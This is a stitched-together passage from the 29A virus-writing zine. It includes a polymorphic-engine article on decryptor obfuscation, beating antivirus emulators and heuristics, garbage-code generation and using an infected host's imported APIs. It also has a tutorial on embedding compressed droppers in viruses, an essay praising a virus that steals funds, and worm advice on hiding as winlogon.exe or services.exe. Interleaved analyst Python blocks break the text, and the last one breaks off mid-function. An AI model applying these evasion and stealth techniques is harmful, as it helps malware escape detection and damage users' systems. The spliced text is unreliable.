Now the real revolution of this formula: I found out, after many tests, that
when you have a counter (Register2) and you XOR a random number with it (always
inside the limits, and I'm not going to repeat that anymore :) you get a
different number, and if you add a slightly special random number to the
XORing value and increase the counter, the next time you XOR it with the
counter you get yet another different number. When you have completed the
whole count sequence (from 0 to NumberPowerOf2), you get a sequence of random
numbers which covers all the numbers from 0 to NumberPowerOf2, with none
repeated! It's like making a permutation of a sequence, but you don't have to
store any vector nor generate any data. Since the formula randomizes all its
numbers, it doesn't differ very much from the "standard" decryptor.
I referred several times to a "special random number", which is the one you
add to the value that gets XORed with the counter. This one is special because
you have to keep it one "level" below the other random numbers. Let me explain
this, and please pay attention, because it's very important:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º When you use this technology, most random numbers are from 0 until the º
º size of the data to decrypt (pow of 2). There's a particularity in the º
º formula that it's necessary for the correct development and returning º
º reliable values: you must "align" the numbers (so, the result of º
º Random(Encrypted_Data_Size) must be multiple of 1 if we decrypt by byte º
º ptr (nothing special here, then), be multiple of 2 if we decrypt by word º
º ptr, and multiple of 4 if we decrypt by dword ptr). But the number that º
º we add to the XORing value is slightly special because it has to be º
º aligned in an upper grade, I mean, if you use byte ptr for decryption, º
º that number must be multiple of 2, multiple of 4 for word ptr and of 8 º
º for dword ptr. That is easily achieved by getting, before coding the º
º opcode of the instruction, the random number to add, and then doing an º
º instruction: º
º AND Value,Encrypted_Data_Size-2 (for bytes), or º
º AND Value,Encrypted_Data_Size-4 (for words), etc. º
º (in the engine, not in the decryptor!). º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Just take this into account because, if not, parts of the encrypted data will
be touched twice, leaving them corrupted (I found this out after going mad and
furious after several hours of looking at a correct engine and an incorrect
decryption, and after coding thousands of little programs to test it :).
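As an added example (not code from the article or from any engine), here is a small Python simulation of the address sequence this loop produces; the names block_size, stride, visit_order and the rest are my own. It lets an analyst reconstructing such a loop confirm that an even stride visits every offset exactly once, and that an odd one, the misalignment the box above warns about, touches some offsets twice and never reaches others.

```python
"""Simulate the decryptor's XOR-based address sequence (added example).

Added for analysis, not code from the article or from any engine: it models
only the order in which offsets of the encrypted block are touched, so the
permutation claim and the alignment rule can be checked. Names such as
block_size, stride and visit_order are this example's own.
"""


def visit_order(block_size, r1_init, r2_init, stride):
    """Return the sequence of offsets (Register1 XOR Register2) the loop touches.

    block_size is Encrypted_Data_Size (must be a power of two); r1_init and
    r2_init are the starting values of Register1 and Register2; stride is the
    constant the engine fixes into the "Register1 += ..." instruction. The loop
    runs until the counter Register2 returns to its starting value, exactly as
    the "if Register2 != InitialValue GOTO Loop_Label" check does. Only
    byte-wise decryption (counter step 1) is modelled.
    """
    if block_size <= 0 or block_size & (block_size - 1):
        raise ValueError("block_size must be a power of two")
    start = r2_init % block_size
    r1, r2 = r1_init % block_size, start
    order = []
    while True:
        order.append(r1 ^ r2)               # offset decrypted in this round
        r1 = (r1 + stride) % block_size     # Register1 += stride, then MOD
        r2 = (r2 + 1) % block_size          # Register2++, then MOD
        if r2 == start:                     # counter wrapped: loop finished
            return order


def covers_every_offset_once(order, block_size):
    """True iff the sequence is a permutation of 0 .. block_size-1."""
    return len(order) == block_size and sorted(order) == list(range(block_size))


def duplicated_offsets(order):
    """Offsets touched more than once; each extra touch re-encrypts the byte."""
    seen, dups = set(), []
    for off in order:
        if off in seen and off not in dups:
            dups.append(off)
        seen.add(off)
    return dups


def aligned_stride(raw, block_size):
    """Apply the engine-side AND the box above prescribes for byte-wise
    decryption: the stride must be one alignment level above the unit, i.e.
    even, so it is ANDed with Encrypted_Data_Size-2."""
    return raw & (block_size - 2)


if __name__ == "__main__":
    size = 256
    good = visit_order(size, 17, 200, aligned_stride(0x4B, size))   # 0x4B & 0xFE = 0x4A
    bad = visit_order(size, 17, 200, 0x4B)                           # odd stride, not ANDed
    print("even stride covers all offsets once:", covers_every_offset_once(good, size))
    print("odd stride duplicates", len(duplicated_offsets(bad)), "offsets")
```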
This method, although powerful, can be defeated by the detection of code
loops, so we must do something to break the linearity of the decryptor's
execution. The easiest way is to put some conditional jumps in the middle,
but it seems that emulators detect which zone of code is executed most
frequently (or something like that), so I thought about it and came up with
the following technique:
When you look at a legitimate application, you can see that it has many
conditional jumps followed by code, and normally a portion of code isn't
executed an absurd number of times the way a decryption loop is. We must break
this, and the way can be this:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³First we have this arrays and values: ³
³ ³
³ArrayOfJumps dd N dup (0) ³
³ArrayOfJumpsNdx dd 0 ³
³JumpsToComplete dd N dup (0) ³
³JumpsToCompleteNdx dd 0 ³
³ ³
³ ³
³ ³ ³
³ ³ This is the beginning of the decryptor. This is the part when the ³
³ ³ registers are setted to their starting value, and all things that ³
³ ³ that we must put at the beginning. ³
³ ³ ³
³ ³ ³
³ x First address stored into ArrayOfJumps ³
³ ³ ³
³ ³ Garbage ³
³ ³ ³
³ .ù*ù. Random conditional jump with a very random probability of jump ³
³ ³ ³ Garbage ³
³ x x 2nd and 3rd address stored into ArrayOfJumps ³
³ ³ ³ Garbage ³
³ .*. .*. Random conditional jumps ³
³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ Four decryption algorithms that perform the same op. but with ³
³ ³ ³ ³ ³ different code. ³
³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³
³ | | | | Final-of-decryption check ³
³ R R R R Loop to continue decrypting (jump randomly to one of the addr. ³
³ | | | | stored in ArrayOfJumps) ³
³ ³ ³ ³ ³ Garbage ³
³ | | | | ³
³ V V V V Jump to decrypted virus ³
³ ³
³(This would be generated with 3 levels of recursivity. Just look down to see³
³the explanation) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I think the technique is quite clear looking at the diagram, but I'll explain
it in words:
1. Â First step Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
You must code a recursive function that I'm going to call "DoBranch".
This function has to manage the coding as if it were a tree. In the
engine, when you begin to construct a decryptor, you first insert the
instructions that set the registers we are going to use to their
operative values. Once you have this, and after generating some garbage,
you call "DoBranch". You must make sure that the function, since it's
recursive, is going to execute several times, so don't use fixed memory
variables. Use stack or indexed variables instead.
2. Â Recursivity r0x! Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
DoBranch takes control, and the function doesn't return completely
until the whole decryptor is finished. The function must know which
level of recursion it is at, so you have to keep a variable that increases
every time you enter "DoBranch" (INC [RecursivityLevel] at the
very beginning). Every time you return from the function you must
decrease that variable.
4. Â Interjumping code Â
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
If you haven't arrived at the desired level of recursion (yet), and
after saving the current address (point 3), generate garbage (a good
amount of it). When you decide that you have enough, generate a random
conditional jump. It must be very random, like CMP Reg1,Reg2/JA xxx
or similar, Reg1 and Reg2 being garbage registers if possible
(the ones you use in garbage instructions). There is a huge set of
possibilities (another very good one is TEST Reg,Value / J(N)Z xxx,
Value being a power of 2 - only one bit set).
We must then store the address of the conditional jump we made, because
we don't know yet which address we have to jump to, so we save it and
later we'll calculate and complete these jumps. It's enough to push the
address onto the stack.
After saving this, we code this leaf of the binary tree: you call
"DoBranch" again, and when it returns... voilà! We have a complete
branch coded, and of course the instruction insertion index points
to the place where the next branch will be. So, we pop the address
that we pushed before, we calculate the distance between the current
insertion index and the saved address, and then we complete the
conditional jump that the saved address points at with that calculated
value. After this little operation, call "DoBranch" again, decrease
[LevelOfRecursivity] and RET.
When we finish, we'll have a decryptor whose behaviour is exactly the same
as a normal one, but where you never know which branch of code is going to be
executed each time, since when you jump back to loop, you perform a random
number of random comparisons and conditional jumps that drive you to a random
decryption part. Since every final part of the branch does the same as the
others, we don't care which one gets executed each time, so we have broken the
linearity of execution and now, "from the outside", the decryptor resembles a
normal application following its conditions, not a decryption loop.
; DL=Register to use
; EAX=Value to move to the register
call GiveMeABufferAddress
; Now, EBX=Buffer address where we can store a dword
call DoMOVMemValue ; Using EBX as address and EAX
; as value
call DoMOVRegMem ; Using EBX as address and DL
; as register
ret
AdjustMemToValue:
mov ecx, eax
call Random ; EAX=Random number
sub ecx, eax
xchg ecx, eax
call DoMOVMemValue ; Move EAX to [EBX]
call MakeGarbage
mov eax, ecx
call DoADDMemValue ; Add EAX to [EBX]
ret
Of course, we don't use only ADD, but XOR, SUB, etc. And we don't use
this only with memory addresses, so we can use it in another way:
AdjustRegToValue:
mov ecx, eax ; ECX=Value to reach
call Random ; EAX=Random number (same split as in AdjustMemToValue)
sub ecx, eax ; ECX=Value-Random
xchg ecx, eax ; EAX=Value-Random, ECX=Random
call DoMOVRegValue ; Recursive call: MOV Reg,(Value-Random)
call MakeGarbage
mov eax, ecx ; EAX=Random
call DoADDRegValue ; ADD Reg,Random, so Reg ends up holding Value
ret
After this, you can see how powerful recursive code generation is, and how
a simple MOV can turn into a quite complex set of assignments to and from
memory/registers, giving as a final result the desired value in the desired
register. Many functions can be done in this way, and later we'll see its
application to making garbage.
ÚÄÄÄÄÄÄ---úú .
| 2. Don't give a chance to AVs |
` úú--ÄÄÄÄÄÄÄÙ
But even the most recursive engine in the world can make all the work
worthless if it's detected heuristically because it emitted a strange
instruction or a quite common polymorphic structure, like:
JMP Next
Subroutine:
...
ret
Next: call Subroutine
or similar, because no normal application does that.
Do you think it's normal to find this in a normal application? Then the
emulator thinks the same :). Avoid this, and avoid inserting direct random
data that isn't tied to any instruction.
This advice also applies to some 16-bit instructions in win32 applications.
While coding the TUAREG engine, I made nearly all the instructions the garbage
generator could generate use 8, 16 or 32 bits, and then, when scanning with
AVP, the emulator always switched to deep scan. After thinking about it, I
removed the generation of some 16-bit instructions and AVP didn't do that
again. I don't know which instructions make AVP raise that heuristic
flag, but I recommend using as few 16-bit instructions as possible.
ÚÄÄÄÄÄÄ---úú .
| 3. Advanced garbage generation |
` úú--ÄÄÄÄÄÄÄÙ
Now we are going to enter one of my favourite subjects: garbage generation.
My opinion is that the main power of a polymorphic engine is its garbage
generation function, since the garbage is the code that makes emulators give
up tracing, or helps them determine the nature of the program. So, the more
normal the garbage seems, the less suspicious the decryptor seems, and the
more complex the garbage is, the less an emulator can get into the decryptor
to emulate it. Let's see some types, although these aren't all of them
(obviously I'm not going to explain the easy ones). Imagination also counts!
But the fact is that, while in MS-DOS we had all the memory accessible and we
could read from everywhere, this isn't true for win32, and an attempt to read
from "everywhere" will, in the great majority of cases, cause an exception.
Writing is much more restrictive under win32, because we can only write to
the sections we defined as WRITABLE in the PE header (unless we want to
generate an exception, of course :). So, we can use some tricks to have frames
of memory to read and/or write indiscriminately.
In win32 executables there is a section that exists in nearly all of them: the
".bss" section. This section has a physical size (in the file) of 0, but
virtually it can be quite big (its size is normally at least 1000h bytes, but
in huge programs it can reach 64K or more). We can use that section to read
and/or write anything we want, but only if we make our virus execute first,
not doing Entry-Point Obscuring and such things, since the application would
set all the empty data in the section to whatever it needs. There is another
solution, which is to use the empty holes in the virus that we use to
retrieve, for example, the current directory with GetCurrentDirectory or
similar functions. Since we don't need those fields until the virus is
executing, we can use those holes, if they are big enough, as frames of memory
in the same way as .bss, where we can read and write things.
So, once we have those frames, and we are sure that at least 256 or 512 bytes
are free to do crazy things in :), we can code a function to retrieve a random
memory address, for example:
call Random
and eax, 0FCh
add eax, [AddressOfMemoryFrame]
ret
It's not easy to put them in, and we can only call those that we know how
to call, so we have to have information about all of them (there isn't a
"generic" way of calling them), and moreover we need to find and scan the
import directory of the victim host while infecting it, so we have to deduce,
from the virtual address (since that's all we know about the import directory
from the PE header), which physical offset it is, and then convert from the
physical offset back to a virtual address to have the address through which
the imported API is called. The method I follow is the following, assuming we
have the host mapped in memory:
5) We scan the imported modules and look for known functions, taking
into account that every time we get an RVA we first have to
convert it to a physical offset (this applies while getting values from
the array of RVAs to the names of the functions), so, having the RVA,
we subtract the RVA of the section and we add the physical offset of
that section, so we get the physical offset of the name of the
function.
6) Then, when we find the desired functions, we get their position in the
array of imported addresses. We add to that number the virtual
address of that array in order to get the virtual address where the
imported address will be stored.
7) We save that number, and we continue searching for more functions.
After that, we have the addresses of the import entries where the virtual
addresses of the functions will be stored. Now, a call like
CALL [Obtained_Address] will call the API. Just be careful with the
parameters and with the functions where a buffer is required.
Another thing: as Micro$oft programmers are dumb or worse, there are functions
that can hang the application, like GetModuleHandleA. I've tried passing it
a random pointer as the name of the module to get the handle of, but then an
exception occurs, instead of it returning an error saying "invalid string" or
"module not found" or something like that, so be careful with some functions.
3.3 Recursive garbage functions
-------------------------------
Earlier we saw the potential of recursive calls for making things, and now we
apply that to garbage. There are some types of garbage that we can make (and
must make) in a recursive way, like CALLs, random loops and some more. Here
I'll explain CALLs and random loops.
Subroutine1:
...
call Subroutine2
...
ret
Subroutine2:
...
call Subroutine1
...
ret
That situation can hang the decryptor, and thus the application never
executes. To avoid that, we can use arrays to store "levels" of calls,
in this way:
When we enter the CALL generation part of the engine, we must increase a
variable, like an internal recursion level, to track the level of the call
that we are generating now, in a way that ensures Level 1 calls never
generate a call to Level 1 or above, and the same for Level 2 and so on. That
way we avoid situations like the one above, since a subroutine won't call
another subroutine that drives execution back to the same subroutine again.
Another kind of recursive garbage generation is random loop generation. We
can put in little, annoying loops that do nothing but loop (just seven or
eight times, nothing that lasts very long). Since a random loop inside a
random loop means a geometric increase in loop duration, it's better to avoid
them, by having a variable saying "I'm in a loop now, so don't make another".
The same applies to CALLs, since we code them later, not at that moment, and
maybe we'd put another loop inside the generated subroutine, which would
produce the same problem. So, when generating looping code, avoid making other
loops or calls. To make the loop, of course, we call DoGarbage to fill some
looping space (an empty loop isn't normal, you know).
And, as you may have deduced, we can use DoMOVRegValue and all those
functions we coded to generate more garbage: just take a garbage register
and a random number and use those functions.
ÚÄÄÄÄÄÄ---úú .
| 4. Last words |
` úú--ÄÄÄÄÄÄÄÙ
Well, this article is shorter than I expected, but I hope it'll be useful in
bringing you ideas while coding your new polymorphic engine. The great
majority of the ideas I expose here have been used in the TUAREG engine, and
sometimes in the source code of TUAREG I refer to this article for the
explanation of some techniques. Laterz!
ÄÄÄÄÄ---úú
The Mental Driller / 29A
ÄÄÄÄÄ---úú
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LZEXPAND Tutorial
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
by Bumblebee/29a
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄ
This tutorial explains how to expand a compressed file using the win API
and MS COMPRESS.EXE. It is a lame tool to compress files with an LZ algo
into the format required by LZEXPAND.DLL. Look at the tools section of this
zine and you'll find COMPRESS.EXE there.
We can compress a dropper, for example, and put it inside your virus body.
Since the dropper was compressed using an external program we don't need
to care about the compression algo. When we need the file uncompressed
we don't need to carry the expand routines inside the virus body because
winshit provides us a simple way to expand it using the standard win32 API.
What is a LZEXPAND.DLL?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It's simply a library that contains some functions to manage LZed
files within our win32 appz.
Let's check what is provided:
There are other functions, but we are going to use only those.
Get LZEXPAND.DLL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We need to load the LZEXPAND.DLL library and get the addresses of the funcs
in order to use them. It is done as usual. Notice we call LZ32.DLL coz
we are running a 32-bit app and LZEXPAND.DLL is a lame NE file :)
Let's show ya an example:
Using LZEXPAND.DLL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OFSTRUCT struc
cBytes db ? ; length of the struct
fFixedDisk db ? ; non zero if file on HDD
nErrCode dw ? ; DOS error code if open fails
Reserved dw ?,?
szPathName db 128 dup(?) ; path name
OFSTRUCT ends
Returns the size of the destination file, or a value < 0 on error.
extrn ExitProcess:PROC
extrn LoadLibraryA:PROC
extrn GetProcAddress:PROC
extrn FreeLibrary:PROC
OFSTRUCT struc
cBytes db ? ; length of the struct
fFixedDisk db ? ; non zero if file on HDD
nErrCode dw ? ; DOS error code if open fails
Reserved dw ?,?
szPathName db 128 dup(?) ; path name
OFSTRUCT ends
file_in db 'file.tx_',0
file_out db 'file.txt',0
hnd_in dd 0
hnd_out dd 0
.CODE
inicio:
push offset LzExpandZs
call LoadLibraryA
or eax,eax
jz LzExpandNotLoaded ; failed loading dll
mov dword ptr [LzExpandHnd],eax
push OF_READ
push offset ofStruct
push offset file_in
call dword ptr [_LZOpenFileA]
test eax,eax
js LzExpandFuncFailed ; a negative return value means the open failed
mov dword ptr [hnd_in],eax
LzExpandFuncFailed:
push dword ptr [LzExpandHnd]
call FreeLibrary
LzExpandFuncNotFound:
LzExpandNotLoaded:
push 0h
call ExitProcess
Ends
End inicio
; cut here ----------------------------------------------------------------
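As an added example that is not part of the tutorial, here is a stand-alone Python expander for the COMPRESS.EXE format that LZEXPAND/LZ32.DLL consume, so an analyst can recover an embedded payload, or just recognize the format inside a binary, without the Windows API. The signature, header layout and LZSS parameters are my assumptions from the publicly documented SZDD format (the tutorial does not state them), and the sample stream is constructed.

```python
"""Stand-alone expander for the MS COMPRESS.EXE ("SZDD") format (added example).

Added for analysts who want to unpack such a file without LZ32.DLL; it is not
code from the tutorial. The signature, header layout and LZSS parameters are
the publicly documented SZDD format and are assumed here, not taken from the
tutorial text; SAMPLE below is a constructed stream, not a real file.
"""
import struct

SZDD_MAGIC = b"SZDD\x88\xF0\x27\x33"    # 8-byte signature written by COMPRESS.EXE
HEADER_SIZE = 14                         # magic + mode + last name char + u32 length
WINDOW_SIZE = 4096                       # 12-bit back-reference offsets


def is_szdd(data):
    """Cheap signature check, e.g. when scanning a binary for embedded blobs."""
    return len(data) >= HEADER_SIZE and data[:8] == SZDD_MAGIC and data[8:9] == b"A"


def parse_szdd_header(data):
    """Validate the header and return (last_char_of_original_name, expanded_size)."""
    if len(data) < HEADER_SIZE or data[:8] != SZDD_MAGIC:
        raise ValueError("not an SZDD (COMPRESS.EXE) stream")
    mode, last_char, size = struct.unpack_from("<cBI", data, 8)
    if mode != b"A":
        raise ValueError("unsupported SZDD mode %r" % mode)
    return (chr(last_char) if last_char else ""), size


def original_filename(compressed_name, last_char):
    """Undo COMPRESS.EXE's renaming: file.txt is stored as file.tx_ plus 't'."""
    if last_char and compressed_name.endswith("_"):
        return compressed_name[:-1] + last_char
    return compressed_name


def szdd_expand(data):
    """Return the expanded bytes, i.e. what LZCopy/LZRead would hand back."""
    _, expected = parse_szdd_header(data)
    window = bytearray(b" " * WINDOW_SIZE)   # window is pre-filled with spaces
    pos = WINDOW_SIZE - 16                    # initial write position inside it
    out = bytearray()
    i = HEADER_SIZE
    while i < len(data) and len(out) < expected:
        control = data[i]                     # one flag bit per following item
        i += 1
        for bit in range(8):
            if len(out) >= expected or i >= len(data):
                break
            if control & (1 << bit):          # flag set: literal byte
                byte = data[i]
                i += 1
                out.append(byte)
                window[pos] = byte
                pos = (pos + 1) % WINDOW_SIZE
            else:                             # flag clear: (offset, length) pair
                if i + 1 >= len(data):
                    break
                lo, hi = data[i], data[i + 1]
                i += 2
                offset = lo | ((hi & 0xF0) << 4)   # 12-bit window offset
                length = (hi & 0x0F) + 3           # 4-bit length, minimum 3
                for k in range(length):
                    byte = window[(offset + k) % WINDOW_SIZE]
                    out.append(byte)
                    window[pos] = byte
                    pos = (pos + 1) % WINDOW_SIZE
    if len(out) < expected:
        raise ValueError("truncated stream: %d of %d bytes" % (len(out), expected))
    return bytes(out[:expected])


# Constructed sample: header for a 15-byte "file.txt", then one control byte
# (0x0F: four literals, then back-references), "ABCD", a reference to the
# four literals just written with length 8, and a reference into the untouched
# (space-filled) part of the window with length 3.
SAMPLE = (SZDD_MAGIC + b"A" + b"t" + struct.pack("<I", 15)
          + bytes([0x0F]) + b"ABCD" + bytes([0xF0, 0xF5]) + bytes([0x00, 0x00]))

if __name__ == "__main__":
    last, size = parse_szdd_header(SAMPLE)
    print(original_filename("file.tx_", last), size, szdd_expand(SAMPLE))
```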
Where to use it
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
With n less than 100 kbs. I've tested with Plage2000 and I've got:
As you can see, in this example we can use LZEXPAND very fine.
Last words
ÄÄÄÄÄÄÄÄÄÄ
Micro$oft Winblows is full of shit we can use for our own profit. We
only need to see what it brings and just take it. Now you can use simple
compression in your projects with the APIs provided by M$.
by VirusBuster/29A
Back in 1997, the well-known antivirus expert Vesselin Bontchev wrote
an article giving twelve reasons to prove that viruses are always a bad idea.
That's too pedantic for my vx taste, so I decided to write this article
explaining why a "good" virus can be a good idea.
First, we will hear what the "good thinking minds" have to say about the
question. Here we have Vesselin's article with his 12 reasons:
by Vesselin Bontchev
2. Modifying a program could mean that the owner of the program loses
his/her rights for technical support, ownership, or copyright.
3. Once released, you have no control on how the virus will spread; it
may reach a system about which you know nothing (or which could have
even not existed at the time the virus is created) and on which it
might cause non-intentional damage. Even if the bug is discovered, it
would be extremely difficult to find all replicants of the virus and
apply the appropriate fix to them.
4. A bad guy could get a copy of the virus and modify it to include
something malicious. Actually, a bad guy could trojanize -any-
program, but a "good" virus will provide the attacker with means to
transport his malicious code to a virtually unlimited population of
computer users.
6. A virus will eat up disk space and time resources unnecessarily while
it spreads.
8. A virus will disable the few programs on the market which check
themselves for modifications and halt themselves if they have been
changed, thus performing a denial-of-service attack.
9. Anything useful that could be done by a virus, could also be done with
a normal, non-replicating program.
10. A virus steals control of the machine from the user and ruins the
trust that the user has in his/her machine - the belief that s/he can
control it.
11. Declaring some viruses as "good" will just give an excuse to the crowd
of virus writers to claim that they are actually doing "research".
12. For most people the word "computer virus" is already loaded with
negative meaning. They will not accept a program called like that,
even if it claims to do something useful.
Here you can read a more recent article talking about the same matter...
(IDG) -- H.L. Mencken once said, "For every human problem, there is a neat,
simple solution; and it is always wrong."
This is tempting for several reasons. One, turning a weapon against itself is a
poetic concept. Two, it's a technical challenge that lets ethical programmers
share in the fun of designing viruses. And three, it sounds like a promising
technique to solve one of the nastiest security problems: patching, or
repairing computer vulnerabilities.
Right now, the best patching techniques involve a lot of negotiation and
manual labor -- which nobody enjoys very much, especially computer
technicians.
Beneficial viruses seem like a nice remedy: You turn a byzantine social
problem into a fun technical solution. You don't have to convince people to
install patches and system updates. You just use the technology to force them
to do what you want.
Therein lies the problem. Patching other people's machines without annoying
them is good; patching other people's machines without their consent is not.
Beneficial viruses are a simple solution that's always wrong. A virus is not
"bad" or "good" based on its payload. Viral propagation mechanisms are
inherently bad, and giving them beneficial payloads doesn't help. A virus
isn't a tool for any rational network administrator, regardless of intent.
All of this means that viruses are easy to get wrong and hard to recover
from. Once a virus starts spreading it's hard to say what it will do. Some
viruses have been written to propagate harmlessly, but wreaked havoc --
ranging from crashed machines to clogged networks -- due to bugs in their
code. Some viruses were written to do damage and turned out to be
harmless, which is even more revealing.
Obviously, I cannot dispute that viruses are basically pernicious, but I
cannot accept the remaining idea in those two articles: viruses are always
bad... they cannot be used for good purposes.
VXers are always the bad guys of the movie... or maybe not... I can, and
I'll prove, that a virus can be a good thing... maybe not legal, but ethically
and morally correct.
In the above text we find the key to the "good" virus... "A virus that
redirects the funds of the weapon manufacturers to the accounts of the
humanitarian organizations."
That sounds like Robin Hood: steal from the rich to give to the poor.
Robin Hood is considered a hero... The virus coder who writes such a virus
has not only reserved a place in the history books, he will also be
considered a hero.
As a final thought I'd like to say that the world badly needs "good"
viruses.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Wormz in 21st century ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Thanx goez to ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
salo, the hacker from Slovakia, for his article "DOYOULOVEME?" published in
the hackerz zine Prielom. it inspired me, and many thoughts in this article
are taken from there.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Introduction ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
still remember the ILOVEYOU worm? yeah, that famous bug that became the most
wide-spread in the world and caused the biggest "damage"... in spring 2000.
after the scandal one polish man, Zalewski (well known from the bugtraq
security conference), decided to show ppl this virus ain't anything to be
afraid of.
from bugtraq (sorry for the inexact translation):
I fully agree with him. why is the world full of stupid macroviruses and vbs
wormz? 90% of all viruses have nothing new to show and were coded by the
cut&paste algorithm. do you believe this is the real danger for the computer
world? we all would like to code some superb worm that could cause a
world-wide infection, that could spread very fast, that could stay
undetectable for a very long time and give you access to the infected
computer, maybe with many more features. well, why do so many lame wormz
still exist, working on the same algorithm:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Anathomy of "perfect worm" ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
yeah, Zalewski also knew that, and knew it long before us. he wanted to
code some worm, a REALLY dangerous one (and as he said, he did it). but hey,
dangerous does not mean destructive. dangerous means a worm with dangerous
spreading abilities. his worm was based on the following 7 rulez:
A) portability: the worm must be independent of the target platform and
must be able to work on various operating systemz, not only on
unix-like systemz, but also dos/win.
B) invisibility: the worm must have many anti-* and masking featurez
implemented for hiding itself in the target system, and be able
to stay undetected for as long as possible.
D) learning abilities: the worm should be able to learn new exploit
techniques on the fly. by release of one updated worm, all other
wormz should be able to download the newest version through a
special communication channel (let's call it "wormnet").
A) portability will probably be a big problem. it will be good to code such a
worm in some HLL language - C will be the best solution, becoz it is supported
on almost every OS. you will need to use the standard run-time libraries as
much as possible. yeah, sometimez you will need to use some system-specific
call, mainly at pointz B) and F). but we code viruses/wormz for fun, not for
making army weapons, so I'm sure almost noone will bother with this point :)
B) what can be harder to code than some silly anti-* routines, you may think.
however, this is not so easy to code and not as unimportant as you think. sure,
you have to implement many anti-* featurez known from virus coding, that's
clear. but that's not all... imagine your worm is executed on some server and
it's running for seven dayz and regularly takes CPU time, for seven dayz. when
the administrator opens the task manager, he will see that some strange
process has been running for seven dayz - and that loox suspicious for sure.
my advice is: change the process ID number and process name and mask the time
the worm has been running. under Win95/98 it is very easy - you can use the
RegisterServiceProcess API, which can make the process invisible. under
WinNT/2k the situation is harder - there's no such API and it's not possible
to make the application invisible in the system - hmm, only by hooking
psapi.dll callz (EnumProcesses API, etc), but this is a bit harder to code. i
know one better method: copy the worm file somewhere under another name (such
as winlogon.exe, services.exe, crcss.exe - if you use the name of an already
running SERVICE, the task manager won't be able to terminate it!), execute it
and terminate itself. this way you will create a whole new process. it's very
easy and efficient!
you might want to register your worm as a service application under WinNT/2k.
in this case just take a look at the OpenSCManagerA and CreateServiceA APIz
exported by ADVAPI32.dll.
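The renaming trick above (a copy of the worm called winlogon.exe, services.exe or csrss.exe) only fools a check that compares process names. A defender's check looks at where each image actually runs from and at near-miss spellings of the protected names. The following is an added example, not code from the article or from any 29A project: the process snapshot is constructed inline, and the protected-name and trusted-directory sets are assumptions for illustration.

```python
"""Flag processes that borrow the name of a protected Windows binary.

Added example (not from the article). It inspects a constructed process
snapshot; on a live system the same fields come from a process enumeration
that reports full image paths (ToolHelp or PSAPI).
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Names the article proposes borrowing. Assumption: a real list is longer.
PROTECTED_NAMES = {"smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe"}

# Directories the genuine images run from, lower-case, drive letter removed.
TRUSTED_DIRS = {r"\windows\system32", r"\winnt\system32"}

# Lookalikes within this many edits of a protected name get flagged too.
MAX_LOOKALIKE_DISTANCE = 2


@dataclass(frozen=True)
class Proc:
    pid: int
    name: str
    image_path: str  # full path of the executable backing the process
    parent_pid: int


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch misspelt lookalike names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def masquerading(procs: list[Proc]) -> list[tuple[int, str]]:
    """Return (pid, reason) for suspicious processes.

    Two checks:
      1. a protected name whose image is not in a trusted system directory;
      2. a name that is not protected but is a near-miss of one (e.g. crcss.exe).
    """
    findings = []
    for p in procs:
        name = p.name.lower()
        if name in PROTECTED_NAMES:
            directory = ntpath.splitdrive(ntpath.dirname(p.image_path))[1].lower()
            if directory not in TRUSTED_DIRS:
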